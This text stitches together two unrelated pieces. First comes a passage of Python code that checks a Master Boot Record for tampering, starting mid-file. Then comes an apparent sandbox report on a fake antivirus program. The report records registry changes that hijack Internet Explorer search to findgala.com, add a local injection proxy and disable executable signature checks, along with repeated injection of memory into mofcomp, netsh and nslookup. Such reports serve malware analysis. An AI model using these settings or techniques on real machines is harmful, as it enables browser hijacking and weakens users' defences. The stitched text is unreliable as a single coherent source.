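PART_ENTRY_FMT = "<B3xB3xII"   # status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count


def parse_partition_entry(entry: bytes) -> dict:
    status, ptype, lba_start, sectors = struct.unpack(PART_ENTRY_FMT, entry)
    return {"bootable": status == 0x80, "type": ptype, "lba_start": lba_start, "sectors": sectors}


def parse_mbr(sector: bytes) -> dict:
    if len(sector) != MBR_SIZE:
        raise ValueError(f"expected {MBR_SIZE} bytes, got {len(sector)}")
    entries = [
        parse_partition_entry(sector[PART_TABLE_OFFSET + i * PART_ENTRY_SIZE:
                                     PART_TABLE_OFFSET + (i + 1) * PART_ENTRY_SIZE])
        for i in range(4)
    ]
    return {
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "disk_signature": struct.unpack_from("<I", sector, BOOT_CODE_LEN)[0],
        "valid_signature": sector[510:512] == BOOT_SIGNATURE,
        "partitions": [e for e in entries if e["type"] != 0],   # type 0 = unused slot
    }


def mbr_findings(sector: bytes, baseline_boot_code_sha256: Optional[str] = None) -> List[str]:
    """Return integrity findings; an empty list means the sector looks sane."""
    info = parse_mbr(sector)
    findings = []
    if not info["valid_signature"]:
        findings.append("boot signature 0x55AA missing")
    bootable = [p for p in info["partitions"] if p["bootable"]]
    if len(bootable) != 1:
        findings.append(f"{len(bootable)} bootable partitions (expected exactly 1)")
    spans = sorted((p["lba_start"], p["lba_start"] + p["sectors"]) for p in info["partitions"])
    for (_, end_a), (start_b, _) in zip(spans, spans[1:]):
        if start_b < end_a:
            findings.append(f"partition overlap at LBA {start_b}")
    if baseline_boot_code_sha256 and info["boot_code_sha256"] != baseline_boot_code_sha256:
        findings.append("boot code differs from recorded baseline")
    return findings


def build_sample_sector(boot_code: bytes, partitions, disk_signature: int = 0x1234ABCD) -> bytes:
    """Assemble a constructed MBR for offline testing (not a real disk image)."""
    sector = bytearray(MBR_SIZE)
    sector[:len(boot_code)] = boot_code
    struct.pack_into("<I", sector, BOOT_CODE_LEN, disk_signature)
    for i, (bootable, ptype, lba_start, sectors) in enumerate(partitions):
        struct.pack_into(PART_ENTRY_FMT, sector, PART_TABLE_OFFSET + i * PART_ENTRY_SIZE,
                         0x80 if bootable else 0x00, ptype, lba_start, sectors)
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


def read_live_mbr(device: str = r"\\.\PhysicalDrive0") -> bytes:
    """Read sector 0 from a raw device; needs administrator rights on Windows (not run in the example)."""
    with open(device, "rb") as fh:
        return fh.read(MBR_SIZE)


# Constructed sample data: a stand-in boot code stub and two NTFS-type (0x07) partitions.
CLEAN_BOOT_CODE = b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 24
SAMPLE_PARTITIONS = [(True, 0x07, 2048, 204800), (False, 0x07, 206848, 4000000)]
CLEAN_SECTOR = build_sample_sector(CLEAN_BOOT_CODE, SAMPLE_PARTITIONS)
BASELINE_HASH = parse_mbr(CLEAN_SECTOR)["boot_code_sha256"]

# Constructed "after" sector: boot code replaced, partition table left intact, which is the
# pattern a baseline hash catches and a partition-table sanity check alone would miss.
TAMPERED_SECTOR = build_sample_sector(b"\xeb\x3c" + b"\xcc" * 30, SAMPLE_PARTITIONS)

if __name__ == "__main__":
    print("clean:   ", mbr_findings(CLEAN_SECTOR, BASELINE_HASH))
    print("tampered:", mbr_findings(TAMPERED_SECTOR, BASELINE_HASH))
```

The structural checks (trailer, single active partition, no overlapping entries) only catch clumsy tampering; a bootkit that hooks the boot code and leaves the partition table alone is caught by the baseline hash, which is why recording a clean boot-code hash per machine matters more than the sanity checks.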

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\PRS = "http://127.0.0.1:27777/?inj=%ORIGINAL%" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IIL = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Download\RunInvalidSignatures = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\BrowserEmulation C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\ltHI = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\ltTST = "15831" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler\Clsid C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\FAKEAV~1\\INTERN~1.EXE" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler\ = "Implements DocHostUIHandler" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Software\Microsoft\Internet Explorer C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF} C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "InternetSecurityGuard.DocHostUIHandler" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Software\Microsoft C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32 C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Software C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\mofcomp.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2528 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2528 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2528 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2528 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2528 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 2528 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 2528 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 2528 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 2528 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
